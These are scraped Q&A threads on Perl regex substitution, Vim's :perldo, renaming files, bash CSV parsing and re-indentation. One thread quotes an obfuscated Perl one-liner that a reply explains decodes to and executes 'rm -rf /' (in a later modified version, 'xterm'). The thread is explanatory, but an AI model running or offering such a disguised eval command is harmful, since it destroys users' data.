VIM 7.2 Scripting problem with `:perldo` and multiple expressions - perl

Background task
To eliminate X-Y problems I'll say what I'm doing: I'm trying to use :perldo in VIM 7.2 to complete two tasks:
Clear all trailing whitespace, including (clearing not deleting) lines that only have whitespace
s/\s+$//;
Remove non-tab whitespace that exists before the first-non space character
s/^ (\s*) (?=\S) / s#[^\t]##g;$_ /xe;
I'd like to do this all with one pass. Currently, using :perldo, I can get this working with two passes. (by using :perldo twice)
The command should look like this:
:perldo s/\s+$//; s/^ (\s*) (?=\S) / s#[^\t]##g;$_ /xe;
Perl background
In order to understand this problem you must know a little bit about Perl s/// automagically binds to the default variable $_ which the regex is free to modify. Most core functions operate on $_ by default.
perl -e'$_="foo"; s/foo/bar/; s/bar/baz/; print' # will print baz
The assumption is that you can chain expressions using :perldo in VIM and that it will work logically.
VIM not being nice
Now my VIM problem is better demonstrated with code -- I've reduced it to a simple test. Open a new buffer place the following text into it:
aa bb
aa
bb
Now run this :perldo s/a/z/; s/b/z/; The buffer now has:
za zb
aa
zb
Why was the first regex unsuccessful on the second row, and yet the second regex was successful by itself, and on the first row?

It appears the whole Perl expression you pass to :perldo must return a true / defined value, or the results are discarded, per-line.
Try this, nothing happens on any line:
:perldo s/a/z/; s/b/z/; 0
Try this, it works on all 3 lines as expected:
:perldo s/a/z/; s/b/z; 1
An example in the :perldo documentation hints at this:
:perldo $_ = reverse($_);1
but unfortunately it doesn't say explicitly what's going on.

Don't know what :perldo is doing exactly, but if you run something like
:perldo s/a/z/+s/b/z/
then you get something more like you'd expect.

Seems to me like only the last command is run on all lines in [range].

Related

Print strings alongside math results in s// substitution with the /e modifier

I am trying to write a very simple one liner to find cases of:
foo N
and replace them with
foo N-Y
For example, if I had 3 files and they had the following lines in them:
foo 5
foo 3
foo 9
After the script is run with Y=4, the lines would read:
foo 1
foo -1
foo 5
I stumbled upon an existing thread that suggested using /e to run code in the replace half of the substitute command and was able to effectively subtract Y from all my matches, but I have no idea how to best print "foo" back into the file since when I try to separate foo and the number into two capture groups and print them back in, perl thinks I am trying to multiply them and wants an operator.
Here's where I'm at:
find . -iname "*somematch*" -exec perl -pi -e 's/(Foo *)(\d+)/$1$2-4/e' {} \;
Of course this doesn't work, "Scalar found where operator expected at -e line 1, near "$1$2." I'm at a loss as to how best to proceed without writing something much longer.
Edit: To be more specific, if I have the /e option enabled to be able to perform math in the substitution, is there a simple way to print the string in another capture group in that substitution without it trying to do math to it?
Alternatively, is there a simple way to surgically perform the substitution on only part of the pattern? I tried to combine m// and s/// to achieve the results but ended up getting nowhere.
The replacement part is treated as code under /e so it need be written using legal syntax, like you'd use in a program. Writing $t$v isn't legal syntax ($1$2 in your regex).
One way to concatenate strings is $t . $v. Then you also need parenthesis around the addition, since by precedence rules the strings $1 and $2 are concatenated first, and that alphanumeric string attempted in addition, drawing a warning. So
perl -i -pe's/(Foo *)([0-9]+)/$1.($2-4)/e'
I replaced \d with [0-9] since \d matches all kinds of "digits," from all over Unicode, what doesn't seem to be what you need.
There is another way if the math comes after the rest of the pattern, as it does in your examples
perl -i -pe's/Foo *\K([0-9]+)/$1-4/e'
Here the \K is a form of positive lookbehind which drops all matches previous to that anchor, so they are not consumed. Thus only the [0-9]+ is replaced, as needed.

rename multiple files possible unintended interpolation

I'm using brew rename to rename multiple files...
file-24.png => file.png
file-48.png => file#2x.png
file-72.png => file#3x.png
the first one is succeed with,,
rename 's/-24//g' *
the second and third...
rename 's/-48/#2x/g' *
and getting Possible unintended interpolation of #2 in string at (eval 2) line 1...
escaping doesnt work..
rename 's/-48/\#2x/g' *
other possible ways to rename multiple files like this case are also welcome..
I don't know what "brew rename" is, but if it uses normal regex
's/pattern/q(#replacement)/e'
This uses /e modifier to evaluate the replacement side as code, where q() operator (single quotes) is used to insert literal characters.
Another way is to use \x40 for # character
's/pattern/\x40replacement/'
or just escape it, use \# in the replacement.
This is suitable for when there's just one character to deal with, like here. if there's more than that then it's easier to single-quote the whole thing, with q() (for which we need /e flag).
Can't help it but ask -- are you certain that you want to have # in a file name? That character gets interpreted in various ways by many tools. For instance, sticking that file name in a variable in a Perl script leads to no end of trouble. Why not even simply file_at_2x.png?
This may be more of a curiousity, but if you have a lot of files you can rename them all with
's{ \-([0-9]+) }{ ($r = $1/24) > 1 && qq(_at_${r}x) || q() }ex'
This captures the number ([0-9]+) into $1. Then, it finds the ratio ($r = $1/24) and if that is >1 then (&& short-circuits) it replaces -number with _at_${r}x, otherwise (||) removes it by putting an empty string, q().
I use {}{} delimiters so that I may use / inside, and }x allows spaces inside, for readability.
Please test this carefully with (a copy of) your actual files, as always.
I know this question is old and maybe the version of rename that apt-get installs is lightly different or improved. However, escaping with a single backslash seems to work:
$ rename -n -v 's/-48/\#2x/g' *
rename(foo-48.txt, foo#2x.txt)

Convert a CSV file with embedded commas into a bash array by line efficiently

Normally, I do something like
IFS=','
columns=( $LINE )
where $LINE is a line from a csv file I'm reading.
However, how do I handle a csv file with embedded commas? I have to handle several hundred gigs of file so everything needs to be done quickly, i.e., no multiple readings of a line, definitely no loops (last time I tried that slowed it down several factors).
The general structure of the code is as follows
FILENAME=$1
cat $FILENAME | while read LINE
do
IFS=","
columns=( $LINE )
# affect columns changes here
newline="${columns[*]}"
echo "$newline"
done
Preferably, I need something that goes
FILENAME=$1
cat $FILENAME | while read LINE
do
IFS=","
# code to tell bash to ignore if IFS is within an open quote
columns=( $LINE )
# affect columns changes here
newline="${columns[*]}"
echo "$newline"
done
Any tips would be appreciated. Otherwise, I'll probably switch to using another language to handle this stuff.
Probably embedded commas is just the first obvious problem that you encountered while parsing those CSV files.
Future problems that might popped are:
embedded newline separator characters
embedded utf8 chars
special treatment for whitespaces, empty fields, spaces around commas, undef values
I generally tend to follow the philosophy that If there is a (reputable) module that parses some
format you have to parse, use it instead of making a homebrew
I don't think there is such a thing for bash, but there are some for Perl. I'd go for Text::CSV_XS. Being written in C I expect it to be very fast.
You can use sed or something similar to convert the commas within quotes to some other sequence or punctuation. If you don't care about the stuff in quotes then you do not even need to change them back. You can do this on the whole file:
sed 's/\("[^,"]*\),\([^"]*"\)/\1;\2/g' input.csv > intermediate.csv
or on each line:
line=$(echo $line | sed 's/\("[^,"]*\),\([^"]*"\)/\1;\2/g')
This isn't a complete answer, but it's a possible approach.
Find a character that never occurs in the input file. Use a C program that parses the CSV file and prints lines to standard output with a different delimiter. Writing that program is left as an exercise, but I'm sure there's CSV-parsing C source code out there. Pipe the output of the C program into your script.
For example:
FILENAME=$1
new_c_program $FILENAME | while read LINE
do
IFS="|"
# code to tell bash to ignore if IFS is within an open quote
columns=( $LINE )
# affect columns changes here
newline="${columns[*]}"
echo "$newline"
done
A minor point: I'd pick a name other than $newline; newline suggests an end-of-line marker rather than an entire line.
Another minor point: you have a "Useless Use Of cat" in the code in your question. You could replace this:
cat $FILENAME | while read LINE
do
...
done
by this:
while read LINE
do
...
done < $FILENAME
But if you replace cat by the hypothetical C program I suggested, you still need the pipe.

Perl specific code

The following program is in Perl.
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-#[-`{-};`-{/" -;;s;;$_;see'
Can somebody help me to understand how it works?
This bit of code's already been asked about on the Debian forums.
According to Lacek, the moderator on that thread, what the code originally did is rm -rf /, though they mention they've changed the version there so that people trying to figure out how it works don't delete their entire filesystem. There's also an explanation there of what the various parts of the Perl code do.
(Did you post this knowing what it did, or were you unaware of it?)
To quote Lacek's post on it:
Anyway, here is how the script works.
It is basically two regex substitutions and one transliteration.
Piping anything into its standard input makes no difference, the perl
code doesn't use its input in any way. If you split the long line on
the boundaries of the expressions, you get this:
$??s:;s:s;;$?::
s;;=]=>%-{\\>%<-{;;
y; -/:-#[-`{-};`-{/" -;;
s;;$_;see
The first line is a condition which does nothing save makes the code
look more difficult. If the previous command originated from the perl
code wasn't successful, it does some substitutions on the standard
input (which the program doesn't use, so effectively it substitutes
the nothing). Since no previous command exists, $? is always 0, so the
first line never gets executed.
The second line substitutes the
standard input (the nothing) for seemingly meaningless garbage.
The third line is a transliteration operator. It defines 4 ranges, in
which the characters gets substituted to the one range and the 4
characters given in the transliteration replacement. I'd prefer not to
write the whole transliteration table here, because it's a bit long.
If you are really interested, just write the characters in the defined
ranges (space to '/', ':' to '#', '[' to '(backtick)', and '{' to '}'), and
write next to them the characters from the replacement range ('(backtick)' to
'{'), and finally, write the remaining characters (/,", space and -)
from the replacement pattern. When you have this table, you can see
what character gets replaced to what.
The last line executes the
resulting command by substituting the nothing with the resulted string
(which is 'xterm'. Originally it was 'system"rm -rf /"', and is held
in $_), evaluates the substitution as an expression and executes it.
(I've substituted 'backtick' for the actual backtick character here so that the code auto-formatting doesn't kick in.)

How to reformat a source file to go from 2 space indentations to 3?

This question is nearly identical to this question except that I have to go to three spaces (company coding guidelines) rather than four and the accepted solution will only double the matched pattern. Here was my first attempt:
:%s/^\(\s\s\)\+/\1 /gc
But this does not work because four spaces get replaced by three. So I think that what I need is some way to get the count of how many times the pattern matched "+" and use that number to create the other side of the substitution but I feel this functionality is probably not available in Vim's regex (Let me know if you think it might be possible).
I also tried doing the substitution manually by replacing the largest indents first and then the next smaller indent until I got it all converted but this was hard to keep track of the spaces:
:%s/^ \(\S\)/ \1/gc
I could send it through Perl as it seems like Perl might have the ability to do it with its Extended Patterns. But I could not get it to work with my version of Perl. Here was my attempt with trying to count a's:
:%!perl -pe 'm<(?{ $cnt = 0 })(a(?{ local $cnt = $cnt + 1; }))*aaaa(?{ $res = $cnt })>x; print $res'
My last resort will be to write a Perl script to do the conversion but I was hoping for a more general solution in Vim so that I could reuse the idea to solve other issues in the future.
Let vim do it for you?
:set sw=3<CR>
gg=G
The first command sets the shiftwidth option, which is how much you indent by. The second line says: go to the top of the file (gg), and reindent (=) until the end of the file (G).
Of course, this depends on vim having a good formatter for the language you're using. Something might get messed up if not.
Regexp way... Safer, but less understandable:
:%s#^\(\s\s\)\+#\=repeat(' ',strlen(submatch(0))*3/2)#g
(I had to do some experimentation.)
Two points:
If the replacement starts with \=, it is evaluated as an expression.
You can use many things instead of /, so / is available for division.
The perl version you asked for...
From the command line (edits in-place, no backup):
bash$ perl -pi -e 's{^((?: )+)}{" " x (length($1)/2)}e' YOUR_FILE
(in-place, original backed up to "YOUR_FILE.bak"):
bash$ perl -pi.bak -e 's{^((?: )+)}{" " x (length($1)/2)}e' YOUR_FILE
From vim while editing YOUR_FILE:
:%!perl -pe 's{^((?: )+)}{" " x (length($1)/2)}e'
The regex matches the beginning of the line, followed by (the captured set of) one or more "two space" groups. The substitution pattern is a perl expression (hence the 'e' modifier) which counts the number of "two space" groups that were captured and creates a string of that same number of "three space" groups. If an "extra" space was present in the original it is preserved after the substitution. So if you had three spaces before, you'll have four after, five before will turn into seven after, etc.